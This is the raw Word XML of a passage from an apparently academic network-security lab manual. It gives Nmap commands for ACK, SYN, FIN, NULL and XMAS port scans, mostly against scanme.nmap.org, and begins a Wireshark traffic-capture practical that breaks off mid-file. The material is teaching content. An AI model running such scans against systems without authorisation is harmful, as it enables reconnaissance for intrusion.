        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AIM :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL, XMAS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for windows and install it. After that open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and type “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” to check if it is installed properly. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now type the below commands.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ACK </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:rStyle w:val="HTMLCod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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:rStyle w:val="HTMLCod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sA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> (TCP ACK scan)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">It never determines open (or even </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>open|filtered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">) ports. It is used to map out firewall rulesets, determining whether they are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>stateful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> or not and which ports are filtered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="581"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="20078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64" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="941"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SYN (Stealth) Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>SYN scan is the default and most popular scan option for good reason. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by intrusive firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -p22</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>,113,139</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5114925" cy="14382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64" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FIN Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Sets just the TCP FIN bit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>para</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4295775" cy="20669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64" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NULL Scan </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Does not set any bits (TCP flag header is 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> –p 22 scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="134620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64" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>XMAS Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4419600" cy="1295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 w:rsidP="005B6F48">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:sectPr w:rsidR="00390B00" w:rsidRPr="00D4195F">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="126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5B6F48" w:rsidP="005B6F48">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8937"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PRACTCAL NO.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00390B00" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId50"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="124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D4195F" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0" w:right="-2673"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="005B6F48" w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">.1) Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005B6F48" w:rsidRPr="00D4195F">
        <w:t>WireShark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005B6F48" w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> sniffer to capture network traffic and analyze.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">Install </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>WireShark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4" w:rsidP="005B6F48">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="93"/>
        <w:ind w:left="0" w:right="4176"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidSect="00D4195F">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1240" w:left="12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num="2" w:space="720" w:equalWidth="0">
            <w:col w:w="7144" w:space="708"/>
            <w:col w:w="2128"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="250"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
